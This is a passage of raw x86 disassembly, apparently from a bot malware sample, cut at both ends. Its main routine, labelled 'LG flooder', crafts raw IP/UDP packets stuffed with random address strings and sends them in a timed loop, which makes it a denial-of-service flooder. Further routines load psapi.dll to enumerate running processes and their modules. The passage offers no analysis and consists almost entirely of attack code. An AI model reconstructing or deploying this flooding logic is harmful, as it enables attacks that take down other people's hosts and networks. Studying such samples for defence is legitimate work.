pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405700: ; CODE XREF: sub_4055E5+106�j
mov eax, [ebp+var_1344]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_C], eax
loc_405710: ; CODE XREF: sub_4055E5+EA�j
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_405729
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405729: ; CODE XREF: sub_4055E5+12F�j
push 1060h
push 0
lea eax, [ebp+var_1074]
push eax
call sub_416B6A ; memset
add esp, 0Ch
lea eax, [ebp+var_1074]
mov [ebp+var_133C], eax
lea eax, [ebp+var_1058]
mov [ebp+var_14], eax
mov eax, [ebp+var_133C]
mov al, [eax]
and al, 0F0h
or al, 5
mov ecx, [ebp+var_133C]
mov [ecx], al
mov eax, [ebp+var_133C]
mov al, [eax]
and al, 0Fh
or al, 40h
mov ecx, [ebp+var_133C]
mov [ecx], al
mov eax, [ebp+var_133C]
mov byte ptr [eax+9], 11h
mov eax, [ebp+var_133C]
mov ecx, [ebp+var_C]
mov [eax+10h], ecx
mov eax, [ebp+var_133C]
mov cx, [ebp+var_E]
mov [eax+16h], cx
and [ebp+var_1338], 0
jmp short loc_4057B6
; ---------------------------------------------------------------------------
loc_4057A9: ; CODE XREF: sub_4055E5:loc_405E22�j
mov eax, [ebp+var_1338]
inc eax
mov [ebp+var_1338], eax
loc_4057B6: ; CODE XREF: sub_4055E5+1C2�j
mov eax, [ebp+var_1338]
cmp eax, [ebp+var_1087]
jge loc_405E27
mov eax, [ebp+var_107F]
mov [ebp+var_1358], eax
cmp [ebp+var_1358], 1
jz short loc_4057FC
cmp [ebp+var_1358], 2
jz loc_405924
cmp [ebp+var_1358], 3
jz loc_405A11
jmp loc_405C71
; ---------------------------------------------------------------------------
loc_4057FC: ; CODE XREF: sub_4055E5+1F6�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_40581E: ; CODE XREF: sub_4055E5+2BF�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4058A9
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_40581E
; ---------------------------------------------------------------------------
loc_4058A9: ; CODE XREF: sub_4055E5+247�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405924: ; CODE XREF: sub_4055E5+1FF�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405946: ; CODE XREF: sub_4055E5+3CB�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4059B2
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405946
; ---------------------------------------------------------------------------
loc_4059B2: ; CODE XREF: sub_4055E5+36F�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405A11: ; CODE XREF: sub_4055E5+20C�j
push 2
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_134C], eax
cmp [ebp+var_134C], 0
jnz short loc_405A52
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset dword_418A60
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405A52: ; CODE XREF: sub_4055E5+444�j
cmp [ebp+var_134C], 1
jnz loc_405B87
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405A81: ; CODE XREF: sub_4055E5+522�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405B0C
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405A81
; ---------------------------------------------------------------------------
loc_405B0C: ; CODE XREF: sub_4055E5+4AA�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405B87: ; CODE XREF: sub_4055E5+474�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405BA9: ; CODE XREF: sub_4055E5+62E�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405C15
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405BA9
; ---------------------------------------------------------------------------
loc_405C15: ; CODE XREF: sub_4055E5+5D2�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
loc_405C6F: ; CODE XREF: sub_4055E5+468�j
; sub_4055E5+59D�j
jmp short loc_405C93
; ---------------------------------------------------------------------------
loc_405C71: ; CODE XREF: sub_4055E5+212�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset dword_418A60
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405C93: ; CODE XREF: sub_4055E5+33A�j
; sub_4055E5+427�j ...
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_1354], eax
and [ebp+var_1350], 0
jmp short loc_405CB8
; ---------------------------------------------------------------------------
loc_405CAB: ; CODE XREF: sub_4055E5+6F9�j
mov eax, [ebp+var_1350]
inc eax
mov [ebp+var_1350], eax
loc_405CB8: ; CODE XREF: sub_4055E5+6C4�j
mov eax, [ebp+var_1350]
cmp eax, [ebp+var_1354]
jnb short loc_405CE0
mov eax, [ebp+var_14]
add eax, [ebp+var_1350]
mov al, [eax]
shl al, 1
mov ecx, [ebp+var_14]
add ecx, [ebp+var_1350]
mov [ecx], al
jmp short loc_405CAB
; ---------------------------------------------------------------------------
loc_405CE0: ; CODE XREF: sub_4055E5+6DF�j
mov eax, [ebp+var_1354]
add eax, 1Ch
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp+var_133C]
mov [ecx+2], ax
call sub_41043F
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp+var_133C]
mov [ecx+4], ax
call sub_410483
neg eax
sbb eax, eax
and al, 0C0h
add eax, 80h
mov ecx, [ebp+var_133C]
mov [ecx+8], al
push 2
push offset dword_41EF48
call ds:dword_417244 ; inet_addr
push eax
call sub_4040E8
pop ecx
pop ecx
mov ecx, [ebp+var_133C]
mov [ecx+0Ch], eax
mov eax, [ebp+var_1354]
add eax, 14h
push eax
push [ebp+var_133C]
call sub_40407D
pop ecx
pop ecx
mov ecx, [ebp+var_133C]
mov [ecx+0Ah], ax
movzx eax, [ebp+var_E]
test eax, eax
jnz short loc_405D7F
call sub_41043F
mov ecx, [ebp+var_133C]
mov [ecx+16h], ax
loc_405D7F: ; CODE XREF: sub_4055E5+789�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp+var_133C]
mov [ecx+14h], ax
mov eax, [ebp+var_1354]
add eax, 8
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp+var_133C]
mov [ecx+18h], ax
push 10h
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+var_1354]
add eax, 1Ch
push eax
lea eax, [ebp+var_1074]
push eax
push [ebp+var_1078]
call ds:dword_417250 ; sendto
mov [ebp+var_1348], eax
cmp [ebp+var_1348], 0FFFFFFFFh
jnz short loc_405E08
push [ebp+var_1334]
call sub_409763
pop ecx
push [ebp+var_1078]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_405E41
; ---------------------------------------------------------------------------
loc_405E08: ; CODE XREF: sub_4055E5+805�j
push [ebp+var_1083]
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_1334]
cmp dword ptr [eax+4], 0
jz short loc_405E22
jmp short loc_405E27
; ---------------------------------------------------------------------------
loc_405E22: ; CODE XREF: sub_4055E5+839�j
jmp loc_4057A9
; ---------------------------------------------------------------------------
loc_405E27: ; CODE XREF: sub_4055E5+1DD�j
; sub_4055E5+83B�j
push [ebp+var_1078]
call sub_4053B1
pop ecx
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
locret_405E41: ; CODE XREF: sub_4055E5+59�j
; sub_4055E5+94�j ...
leave
retn 4
sub_4055E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E45 proc near ; CODE XREF: sub_40A9CF+8B2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_405E5D
cmp [ebp+arg_8], 0
jz short loc_405E5D
cmp [ebp+arg_14], 0
jnz short loc_405E62
loc_405E5D: ; CODE XREF: sub_405E45+A�j
; sub_405E45+10�j
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E62: ; CODE XREF: sub_405E45+16�j
push 2B9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405E7B
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E7B: ; CODE XREF: sub_405E45+2F�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A7h
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 2A7h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2ADh], eax
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B1h], eax
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B5h], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 0EA60h
jge short loc_405F0E
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_8], eax
jmp short loc_405F15
; ---------------------------------------------------------------------------
loc_405F0E: ; CODE XREF: sub_405E45+B9�j
mov [ebp+var_8], 0EA60h
loc_405F15: ; CODE XREF: sub_405E45+C7�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+2B1h], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 64h
jle short loc_405F3B
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_C], eax
jmp short loc_405F42
; ---------------------------------------------------------------------------
loc_405F3B: ; CODE XREF: sub_405E45+E6�j
mov [ebp+var_C], 64h
loc_405F42: ; CODE XREF: sub_405E45+F4�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+2B1h], ecx
push offset aLgFlooder ; "LG flooder"
push 0
push [ebp+var_4]
push offset sub_4055E5
call sub_4095A4
add esp, 10h
locret_405F65: ; CODE XREF: sub_405E45:loc_405E5D�j
; sub_405E45+31�j
leave
retn
sub_405E45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F67 proc near ; CODE XREF: sub_4017AA+6E�p
; sub_401D6E+77�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
jnz short loc_405F8E
push 1A3h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_0]
mov byte ptr [eax+198h], 1
jmp short loc_405FA1
; ---------------------------------------------------------------------------
loc_405F8E: ; CODE XREF: sub_405F67+7�j
push 1A3h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
loc_405FA1: ; CODE XREF: sub_405F67+25�j
pop ebp
retn
sub_405F67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FA3 proc near ; CODE XREF: sub_4167F1+D0�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push offset dword_41E2B0
call sub_409C36
pop ecx
push offset aPsapi_dll ; "psapi.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405FC8
jmp short locret_40603F
; ---------------------------------------------------------------------------
loc_405FC8: ; CODE XREF: sub_405FA3+21�j
push offset aEnumprocesses ; "EnumProcesses"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41E2AC, eax
push offset aEnumprocessmod ; "EnumProcessModules"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41E2A0, eax
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41E2A4, eax
push offset aGetmoduleinfor ; "GetModuleInformation"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41E2A8, eax
cmp dword_41E2AC, 0
jz short locret_40603F
cmp dword_41E2A0, 0
jz short locret_40603F
cmp dword_41E2A4, 0
jz short locret_40603F
cmp dword_41E2A8, 0
jz short locret_40603F
mov byte_41E2CC, 1
locret_40603F: ; CODE XREF: sub_405FA3+23�j
; sub_405FA3+78�j ...
leave
retn
sub_405FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406041 proc near ; CODE XREF: sub_401244:loc_40129D�p
; sub_40637C+29�p
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_12B = byte ptr -12Bh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push esi
push edi
push offset dword_41E2B0
call sub_409C6C
pop ecx
movzx eax, byte_41E2CC
test eax, eax
jnz short loc_406074
push offset dword_41E2B0
call sub_409C7A
pop ecx
xor eax, eax
jmp loc_40636A
; ---------------------------------------------------------------------------
loc_406074: ; CODE XREF: sub_406041+1F�j
and [ebp+var_C], 0
and [ebp+var_4], 0
and [ebp+var_1C], 0
push [ebp+var_1C]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_406097
jmp loc_406368
; ---------------------------------------------------------------------------
loc_406097: ; CODE XREF: sub_406041+4F�j
; sub_406041:loc_4060E9�j
mov eax, [ebp+var_1C]
add eax, 80h
mov [ebp+var_1C], eax
push [ebp+var_1C]
push [ebp+var_14]
call sub_416BF6 ; realloc
pop ecx
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4060BD
jmp loc_406366
; ---------------------------------------------------------------------------
loc_4060BD: ; CODE XREF: sub_406041+75�j
lea eax, [ebp+var_4]
push eax
push [ebp+var_1C]
push [ebp+var_14]
call dword_41E2AC
test eax, eax
jnz short loc_4060DF
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406364
; ---------------------------------------------------------------------------
loc_4060DF: ; CODE XREF: sub_406041+8E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_1C]
jnb short loc_4060E9
jmp short loc_4060EB
; ---------------------------------------------------------------------------
loc_4060E9: ; CODE XREF: sub_406041+A4�j
jmp short loc_406097
; ---------------------------------------------------------------------------
loc_4060EB: ; CODE XREF: sub_406041+A6�j
mov eax, [ebp+var_4]
shr eax, 2
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
imul eax, 114h
add eax, 8
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_40611E
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406362
; ---------------------------------------------------------------------------
loc_40611E: ; CODE XREF: sub_406041+CD�j
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov eax, [ebp+var_C]
add eax, 8
mov ecx, [ebp+var_C]
mov [ecx+4], eax
and [ebp+var_10], 0
jmp short loc_40613F
; ---------------------------------------------------------------------------
loc_406138: ; CODE XREF: sub_406041+156�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_40613F: ; CODE XREF: sub_406041+F5�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb short loc_406199
push 114h
push 0
mov eax, [ebp+var_C]
push dword ptr [eax+4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_10]
mov esi, [ebp+var_14]
mov edx, [esi+edx*4]
mov [ecx+eax], edx
push offset aSystem ; "system"
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_406138
; ---------------------------------------------------------------------------
loc_406199: ; CODE XREF: sub_406041+104�j
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
and [ebp+var_10], 0
jmp short loc_4061AF
; ---------------------------------------------------------------------------
loc_4061A8: ; CODE XREF: sub_406041+1A8�j
; sub_406041+1D8�j ...
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4061AF: ; CODE XREF: sub_406041+165�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb loc_406343
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
push 410h
call ds:dword_417094 ; OpenProcess
mov [ebp+var_130], eax
cmp [ebp+var_130], 0
jnz short loc_4061EB
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_4061EB: ; CODE XREF: sub_406041+1A6�j
and [ebp+var_20], 0
and [ebp+var_28], 0
lea eax, [ebp+var_20]
push eax
push 4
lea eax, [ebp+var_28]
push eax
push [ebp+var_130]
call dword_41E2A0
test eax, eax
jnz short loc_40621B
push [ebp+var_130]
call ds:dword_4170A4 ; CloseHandle
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_40621B: ; CODE XREF: sub_406041+1CA�j
push 0Ch
lea eax, [ebp+var_13C]
push eax
push [ebp+var_28]
push [ebp+var_130]
call dword_41E2A8
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_13C]
mov [ecx+eax+4], edx
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_138]
mov [ecx+eax+8], edx
mov al, byte_41DE30
mov [ebp+var_12C], al
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_12B]
rep stosd
stosw
stosb
push 104h
lea eax, [ebp+var_12C]
push eax
push [ebp+var_13C]
push [ebp+var_130]
call dword_41E2A4
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_406332
movsx eax, [ebp+var_12C]
test eax, eax
jz short loc_406332
push 104h
lea eax, [ebp+var_12C]
push eax
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_12C]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_18], eax
jmp short loc_4062F7
; ---------------------------------------------------------------------------
loc_4062F0: ; CODE XREF: sub_406041:loc_406330�j
mov eax, [ebp+var_18]
dec eax
mov [ebp+var_18], eax
loc_4062F7: ; CODE XREF: sub_406041+2AD�j
cmp [ebp+var_18], 0
jz short loc_406332
cmp [ebp+var_18], 1
ja short loc_406305
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406305: ; CODE XREF: sub_406041+2C0�j
mov eax, [ebp+var_18]
movsx eax, byte ptr [ebp+eax+var_130+3]
cmp eax, 5Ch
jnz short loc_406330
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_18]
mov [ecx+eax+110h], edx
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406330: ; CODE XREF: sub_406041+2D2�j
jmp short loc_4062F0
; ---------------------------------------------------------------------------
loc_406332: ; CODE XREF: sub_406041+264�j
; sub_406041+273�j ...
push [ebp+var_130]
call ds:dword_4170A4 ; CloseHandle
jmp loc_4061A8
; ---------------------------------------------------------------------------
loc_406343: ; CODE XREF: sub_406041+174�j
push offset dword_41E2B0
call sub_409C7A
pop ecx
mov eax, [ebp+var_C]
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406353: ; CODE XREF: sub_406041:loc_406362�j
; sub_406041:loc_406364�j ...
push offset dword_41E2B0
call sub_409C7A
pop ecx
xor eax, eax
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406362: ; CODE XREF: sub_406041+D8�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406364: ; CODE XREF: sub_406041+99�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406366: ; CODE XREF: sub_406041+77�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406368: ; CODE XREF: sub_406041+51�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_40636A: ; CODE XREF: sub_406041+2E�j
; sub_406041+310�j ...
pop edi
pop esi
leave
retn
sub_406041 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40636E proc near ; CODE XREF: sub_401244+4D2�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_40636E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40637C proc near ; DATA XREF: sub_4064BF+3B�o
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_406041
mov [ebp+var_1AC], eax
cmp [ebp+var_1AC], 0
jz loc_4064AD
mov eax, [ebp+var_1AC]
push dword ptr [eax]
mov eax, [ebp+var_1A8]
push dword ptr [eax]
push offset dword_418B1C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
and [ebp+var_1B0], 0
jmp short loc_4063F7
; ---------------------------------------------------------------------------
loc_4063EA: ; CODE XREF: sub_40637C:loc_40649C�j
mov eax, [ebp+var_1B0]
inc eax
mov [ebp+var_1B0], eax
loc_4063F7: ; CODE XREF: sub_40637C+6C�j
mov eax, [ebp+var_1AC]
mov ecx, [ebp+var_1B0]
cmp ecx, [eax]
jge loc_4064A1
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+8]
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+4]
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push offset dword_418B04
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
mov eax, [ebp+var_1A8]
cmp dword ptr [eax+4], 0
jz short loc_40649C
jmp short loc_4064A1
; ---------------------------------------------------------------------------
loc_40649C: ; CODE XREF: sub_40637C+11C�j
jmp loc_4063EA
; ---------------------------------------------------------------------------
loc_4064A1: ; CODE XREF: sub_40637C+89�j
; sub_40637C+11E�j
push [ebp+var_1AC]
call sub_416B4C ; free
pop ecx
loc_4064AD: ; CODE XREF: sub_40637C+3B�j
push [ebp+var_1A8]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40637C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4064BF proc near ; CODE XREF: sub_40A9CF+3FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
